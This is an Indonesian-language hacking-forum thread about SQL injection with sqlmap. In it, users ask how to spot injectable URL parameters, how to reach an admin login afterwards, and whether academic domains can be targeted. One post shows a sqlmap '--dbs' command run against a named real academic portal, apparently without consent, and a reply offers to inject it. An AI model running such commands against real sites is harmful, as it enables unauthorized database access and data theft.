SQLi Sqlmap.py
#21
mau tanya mas

misal ini
http://forum.id-backtrack.com/showthread...713&page=2

kan sqli mesti kudu ada "=2" yaa?

dan untuk cek ada bugs apa tidak tinggal ditambah (') tanpa tanda kurung.

nah kalo kagak ada gmn mas?
.....................................................
:apn: ~= Share Until Die =~ :apn:
.....................................................

#22
om kalo udah dapet trus cara masuknya gimana ya?
[shcode=This_site_xss-ed]

#23
wah jalan bro
tinggal nyari admin login nya aja neh xixixi

#24
(10-10-2011, 09:50 PM)Liyan Oz Wrote:
(10-10-2011, 09:02 PM)L-icious Wrote: wah jalan bro
tinggal nyari admin login nya aja neh xixixi

iya ... bikinn aja pake script php hehehhee

ada sih script python nya
tp ga jalan di BT5 >.<

#25
(10-11-2011, 02:54 PM)L-icious Wrote:
(10-10-2011, 09:50 PM)Liyan Oz Wrote:
(10-10-2011, 09:02 PM)L-icious Wrote: wah jalan bro
tinggal nyari admin login nya aja neh xixixi

iya ... bikinn aja pake script php hehehhee

ada sih script python nya
tp ga jalan di BT5 >.<

Dishare dong om Smile
Di thread baru lagi Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#26
[email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://ap-iti.academic-portal.net//catalog.php?id=129 --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:52:23

[22:52:23] [INFO] using '/pentest/database/sqlmap/output/ap-iti.academic-portal.net/session' as session file
[22:52:29] [INFO] testing connection to the target url
[22:52:29] [CRITICAL] page not found (404)
[22:52:29] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times

kalo keluar kaya gini maksudnya apa kk...??
maaf sebelumya maklum pengguna baru...

#27
(10-12-2011, 12:00 AM)rajatega Wrote: [email protected]:/pentest/database/sqlmap# python sqlmap.py -u http://ap-iti.academic-portal.net//catalog.php?id=129 --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:52:23

[22:52:23] [INFO] using '/pentest/database/sqlmap/output/ap-iti.academic-portal.net/session' as session file
[22:52:29] [INFO] testing connection to the target url
[22:52:29] [CRITICAL] page not found (404)
[22:52:29] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times

kalo keluar kaya gini maksudnya apa kk...??
maaf sebelumya maklum pengguna baru...

itu ada error 404 ==>> berarti page not found katanya alias g ketemu halam dari link tersebut,, boleh ijin ane tes inject?

perhatikan link url nya,, ada double "/" sebelum catalog.php

#28
om... tanya satu donk.. target apakah harus berdomain .net, .com, .co.id, atau domain yg biasa kita temukan secara umum ya? kalo misalnya domain nya .ac.id bisa ga ya?

<<bete|five

#29
Domain secara umum om..
karena dia scan php/bug2nya..
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#30
(09-04-2011, 03:36 PM)andriestifler Wrote: mau tanya mas

misal ini
http://forum.id-backtrack.com/showthread...713&page=2

kan sqli mesti kudu ada "=2" yaa?

dan untuk cek ada bugs apa tidak tinggal ditambah (') tanpa tanda kurung.

nah kalo kagak ada gmn mas?

klo gk ada berarti gk vulrn situsnya bro terhadap sql injection .. tapi banyak cara menuju roma

(09-08-2011, 09:44 PM)koecroet Wrote: om kalo udah dapet trus cara masuknya gimana ya?

liat komen di bwah ente .. tinggal nyari login admin tuh Tongue





Users browsing this thread: 1 Guest(s)